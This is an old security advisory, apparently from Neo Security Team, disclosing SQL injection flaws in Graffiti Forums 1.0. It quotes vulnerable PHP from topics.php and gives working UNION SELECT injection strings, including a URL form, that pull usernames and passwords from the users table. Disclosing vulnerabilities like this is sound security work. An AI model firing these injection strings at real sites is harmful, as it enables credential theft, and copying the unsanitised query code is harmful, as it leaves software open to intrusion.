/*=0D
--------------------------------------------------------=0D
[N]eo [S]ecurity [T]eam [NST] - Advisory #24 - 08/07/06=0D
--------------------------------------------------------=0D
Program: Graffiti Forums=0D
Homepage: http://www.bluedojo.com/=0D
Vulnerable Versions: 1.0.=0D
Risk: High!=0D
Impact: Critical Risk=0D
=0D
-==Graffiti Forums v1.0 SQL Injection Vulnerabilities==-=0D
---------------------------------------------------------=0D
=0D
- Description=0D
---------------------------------------------------------=0D
This forum uses PHP, MySQL, and Java and is very easy to install. It lets people draw pictures to a graffiti "wall" instead =0D
of posting text messages as in traditional forums.=0D
=0D
- Tested=0D
---------------------------------------------------------=0D
localhost=0D
=0D
- Explotation=0D
-------------------------------------------------=BA--------=0D
=0D
1)=0D
=0D
Vulnerable code:=0D
=0D
==[ topics.php 8-11 ]===========================0D
[...]=0D
$sql = "SELECT forum FROM graffiti_forums WHERE id=$f";=0D
$result = mysql_query($sql);=0D
$sql_row = mysql_fetch_row($result);=0D
$forum_title = $sql_row[0];=0D
[...]=0D
==[ end topics.php ]===========================0D
=0D
How we can see there's no protection for the using of simple quotes in the sql query. Also we have to say that the script =0D
doesn't work with register_globals off.=0D
=0D
In this way, we can put in the $f variable something like that =0D
2 UNION SELECT password as forum FROM graffiti_users=0D
=0D
So the sql query looks like this:=0D
=0D
SELECT forum FROM graffiti_forums WHERE id=2 UNION SELECT password as forum FROM graffiti_users=0D
=B4=0D
Here, 2 is a valid forum id. Using some ORDER BY clauses you can get differents things... check it out.=0D
=0D
=0D
2) =0D
==[ topics.php 21-32 ]===========================0D
[...]=0D
if (!$option){=0D
$sql = "SELECT id, topic FROM graffiti_topics WHERE id_forum=" . $f;=0D
if ($result = mysql_query($sql)){=0D
echo("");=0D
while ($sql_row = mysql_fetch_row($result)){=0D
echo("");=0D
echo("");=0D
$id = $sql_row[0];=0D
$topic = $sql_row[1];=0D
echo("");=0D
echo(" $topic");=0D
echo("");=0D
[...]=0D
==[ end topics.php ]===========================0D
=0D
In the SQL query of this code we can see the same bug. The explotation is very similar that the other:=0D
=0D
topics.php?f=2 UNION SELECT password as topic, username as id FROM graffiti_users=0D
=0D
The final sql query looks like this:=0D
=0D
SELECT forum FROM graffiti_forums WHERE id=2 UNION SELECT password as topic, username as id FROM graffiti_users=0D
=0D
Here, 2 is a valid forum id. Another time you can play with some ORDER BY or GROUP BY clauses.=0D
=0D
=0D
Practically all the sql querys of this script are vulnerable to SQL Injections, so i'm not going to keep searching bugs on a =0D
bugs cave.=0D
=0D
Attention: the magic_quotes_gpc php flag has to be off (no filtering for slashes, simple quotes and double quotes). Also =0D
remember that the script doesn't work without register_globals Off.=0D
=0D
=0D
- How to fix it? More information?=0D
--------------------------------------------------------=0D
Visit our forum to know how to fix it or to get more information.=0D
http://www.neosecurityteam.net/foro/=0D
=0D
- References=0D
--------------------------------------------------------=0D
http://www.neosecurityteam.net/index.php?action=advisories&id=24=0D
=0D
- Credits=0D
--------------------------------------------------------=0D
Discovered by Paisterist -> paisterist.nst [at] gmail [dot] com=0D
=0D
[N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/=0D
=0D
=0D
- Greets=0D
--------------------------------------------------------=0D
HaCkZaTaN=0D
K4P0=0D
Daemon21=0D
Link=0D
0m3gA_x=0D
LINUX=0D
m0rpheus=0D
=0D
Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!=0D
=0D
@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@=0D
'@@@@@''@@'@@@''''''''@@''@@@''@@=0D
'@@'@@@@@@''@@@@@@ @@@'''''@@@=0D
'@@'''@@@@'''''''''@@@''''@@@=0D
@@@@''''@@'@@@@@@@@@@''''@@@@@=0D
=0D
/* EOF */=0D
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
|